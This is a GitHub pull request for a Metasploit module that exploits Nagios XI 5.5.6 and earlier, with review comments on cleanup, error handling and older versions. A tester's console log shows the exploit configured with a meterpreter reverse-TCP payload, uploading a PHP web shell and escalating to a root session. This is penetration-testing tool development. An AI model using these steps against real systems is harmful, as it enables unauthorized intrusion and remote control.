nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes
rapid7/metasploit-framework pull request #14757
Opened 2021-02-15 11:26 UTC by bcoles

Resolve Rubocop violations
Fix off-by-one in array index triggered when no file upload succeeds
Fix cleanup: ensure files are removed when upload succeeds but execution fails
Add module notes
Add error handling and associated operator feedback
Add additional writable paths required for some old Nagios versions
Add fallback to session as `apache` if privlege escalation fails

2021-03-15 18:49 UTC, gwillcox-r7 requested changes
Overall changes look good, but did have a few areas of concern and a suggestion r.e using an existing variable.

2021-03-16 02:55 UTC, bcoles commented on modules/exploits/linux/http/nagios_xi_magpie_debug.rb
> +      return false
> 
> 
> Would these not be better written as `fail_with()` statements? Not sure why `return false` is being used in this section as I can't see any similar modules using it within their `primer()` methods.

No. `primer` is called for every attempted file upload.

2021-03-16 03:12 UTC, bcoles commented on modules/exploits/linux/http/nagios_xi_magpie_debug.rb
> +          This module exploits two vulnerabilities in Nagios XI <= 5.5.6:
>  Is there reason to believe this was not the case?

Yes. The vulnerability exists in versions prior to 5.5.6 going back at least as far as 5.4.4. This PR updates the module to work with previous versions as per the OP.

5.2.x is likely also vulnerable; however, the virtual appliance is so old that the version of cURL in use cannot connect to our HTTP server using HTTPS which is a requirement for the exploitation technique used in this module. This sucks and is a fundamental flaw in the module architecture as described in the OP.

2021-03-16 03:25 UTC, bcoles commented on modules/exploits/linux/http/nagios_xi_magpie_debug.rb
> +    register_file_for_cleanup("#{@WRITABLE_PATHS[@writable_path_index][0]}/#{@current_payload}")
Evidently I missed one spaghetti strand.

2021-03-16 03:29 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_magpie_debug.rb
> +      return false
Thanks for clarification, given this info I'll mark this as being resolved.

2021-03-16 03:32 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_magpie_debug.rb
> +          This module exploits two vulnerabilities in Nagios XI <= 5.5.6:
Ah you didn't mention that in your OP, but appreciate the explanation, just wanted to double check this but your explanation makes sense. As for the old appliance, no worries there. Marking resolved.

2021-03-16 03:40 UTC, bcoles commented on modules/exploits/linux/http/nagios_xi_magpie_debug.rb
> +          This module exploits two vulnerabilities in Nagios XI <= 5.5.6:
> Ah you didn't mention that in your OP

I dedicated an entire section of the OP to "Add additional writable paths required for some old Nagios versions".

2021-03-16 07:09 UTC, bcoles commented on modules/exploits/linux/http/nagios_xi_magpie_debug.rb
> +    print_status("Uploading to #{path} ...")
updated

2021-03-16 21:27 UTC, gwillcox-r7 approved these changes

2021-03-16 21:28 UTC, gwillcox-r7 commented
Just doing a quick test of these changes on the target to verify results but otherwise looks good and I like the new documentation updates 👍  Thanks for making these changes @bcoles!

2021-03-16 22:43 UTC, gwillcox-r7 commented
Sorry for the delay was testing this with `eth0` as the `RSRVHOST` but realized it doesn't support that format despite running normally (area for improvement in the future), but after adjusting that to be an actual IP address it works like a charm:

```
msf6 exploit(linux/http/nagios_xi_magpie_debug) > show options

Module options (exploit/linux/http/nagios_xi_magpie_debug):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Number of seconds the web server will wait before termination
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.23.2.44      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   RSRVHOST   172.23.3.134     yes       A public IP at which your host can be reached (e.g. your router IP)
   RSRVPORT   8080             yes       The port that will forward to the local HTTPS server
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local m
                                         achine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.23.3.134     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Nagios XI <= 5.5.6


msf6 exploit(linux/http/nagios_xi_magpie_debug) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_magpie_debug) > 
[*] Started reverse TCP handler on 172.23.3.134:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Found MagpieRSS.
[*] Using URL: https://0.0.0.0:8080/tKD2svyIoi3AF
[*] Local IP: https://172.23.3.134:8080/tKD2svyIoi3AF
[*] Server started.
[*] Uploading to /usr/local/nagvis/share/skkJSzNFNFJ.php ...
[+] skkJSzNFNFJ.php uploaded successfully!
[*] Using URL: https://0.0.0.0:8080/VdD84o5rWt
[*] Local IP: https://172.23.3.134:8080/VdD84o5rWt
[*] Server started.
[*] Uploading to /usr/local/nagvis/share/TVklAKnyHZgK ...
[+] TVklAKnyHZgK uploaded successfully!
[*] Checking PHP web shell: /nagvis/skkJSzNFNFJ.php
[+] Success! Commands executed as user: uid=33(www-data) gid=33(www-data) groups=33(www-data),1001(nagios),1002(nagcmd)
[*] Attempting privilege escalation ...
[*] Sending stage (3008420 bytes) to 172.23.2.44
[*] Meterpreter session 1 opened (172.23.3.134:4444 -> 172.23.2.44:51084) at 2021-03-16 17:41:02 -0500
[+] Deleted /usr/local/nagvis/share/skkJSzNFNFJ.php
[+] Deleted /usr/local/nagvis/share/TVklAKnyHZgK
[!] This exploit may require manual cleanup of '/var/tmp/gGQhkZxuni.nse' on the target
[*] Server stopped.

msf6 exploit(linux/http/nagios_xi_magpie_debug) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root @ test-Virtual-Machine (uid=0, gid=0, euid=0, egid=0)
meterpreter > 
```

Landing this now :)

2021-03-16 22:45 UTC, merged

2021-03-16 22:50 UTC, gwillcox-r7 commented
# Release Notes
The `nagios_xi_magpie_debug` module has been updated to automatically check if the target is vulnerable and improve error handling and documentation. Additionally the module has been updated so that it supports older versions of Nagios by adding additional writable paths that the exploit can use, and a fallback mechanism has been implemented to gain a shell as `apache` if the privilege elevation attempt fails.